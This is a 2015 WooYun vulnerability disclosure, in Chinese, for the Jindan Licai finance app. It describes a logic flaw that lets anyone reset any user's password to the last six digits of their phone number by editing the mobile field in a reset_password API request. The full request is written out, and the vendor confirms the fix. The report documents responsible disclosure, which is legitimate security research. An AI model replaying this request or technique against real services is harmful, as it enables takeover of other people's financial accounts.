当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139511

漏洞标题:金蛋理财APP任意用户重置密码

相关厂商:jindanlicai.com

漏洞作者: Zhe

提交时间:2015-09-07 15:19

修复时间:2015-10-23 13:58

公开时间:2015-10-23 13:58

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-07: 细节已通知厂商并且等待厂商处理中
2015-09-08: 厂商已经确认,细节仅向厂商公开
2015-09-18: 细节向核心白帽子及相关领域专家公开
2015-09-28: 细节向普通白帽子公开
2015-10-08: 细节向实习白帽子公开
2015-10-23: 细节向公众公开

简要描述:

RT,看了前面一个洞,求高rank,挖洞不易

详细说明:

官网下载APP
http://jindanlicai.com/
注册后走一波重置流程,提取关键一步
看接口

POST https://api.jindanlicai.com/v2/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: ""
Cookie: udid=C6B156109E96A281B93BF86D667F13CB
Content-Length: 417
Host: api.jindanlicai.com
Connection: Keep-Alive
Cookie: __jsluid=24388ff2498c98736f4e326e354a1a2a; jdtk=a862dcf0a196a3f6f2e58c8e9563203a
Cookie2: $Version=1
{"statics":{"os":"android4.3","udid":"C6B156109E96A281B93BF86D667F13CB","push_channelid":"4224745743595125467","simnumber":"","version":"3.1.4","token":"","device_token":"000000000000000","connecttype":"","push_userid":"916392260811243697","push_appid":"5336588","ua":"wooyun","user_id":"","imsi":"","channel":"main","mobile":"","system_version":"4.3"},"fun":{"reset_password":{"mobile":"13333333333"}},"version":"2"}


1.jpg


修改请求中的手机号,即可完成重置,重置后的密码为手机后6位
登录验证
13333333333 333333

2.jpg


18888888888 888888

3.jpg


漏洞证明:

如上

修复方案:

加强验证

版权声明:转载请注明来源 Zhe@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-09-08 13:56

厂商回复:

未认证用户,修改密码存在漏洞, 已关闭。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-16 15:34 | DNS ( 普通白帽子 | Rank:436 漏洞数:53 | 猜猜我是谁?)

    我今天正打算看呢,。。。。。

  2. 2015-09-24 12:50 | 金蛋-的士(乌云厂商)

    感谢给我们提供漏洞信息。稍后跟您联系,有小礼物寄出~